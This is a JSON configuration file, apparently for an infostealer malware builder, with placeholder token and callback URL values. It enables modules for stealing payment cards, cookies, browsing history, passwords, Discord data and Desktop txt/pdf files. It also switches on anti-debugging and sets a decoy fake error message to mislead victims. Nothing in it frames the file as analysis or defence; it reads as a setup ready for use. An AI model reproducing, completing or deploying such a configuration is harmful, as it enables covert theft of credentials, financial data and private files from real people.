{
  "MAP$config.token$": "000000000000000",
  "MAP$config.url$": "http://127.0.0.1",
  "MAP$config.quiet$": false,
  "MAP$config.modules$": [
    "card",
    "cookie",
    "history",
    "password",
    "files",
    "discord",
    "error"
  ],
  "MAP$config.antivm$": false,
  "MAP$config.antidebug$": true,
  "MAP$config.error$": {
    "MAP$config.error.title$": "Some error",
    "MAP$config.error.message$": "Very real error message"
  },
  "MAP$config.files$": {
    "MAP$config.files.max$": 5,
    "MAP$config.files.dirs$": ["C:/Users/%USERNAME%/Desktop"],
    "MAP$config.files.exts$": ["txt", "pdf"]
  }
}
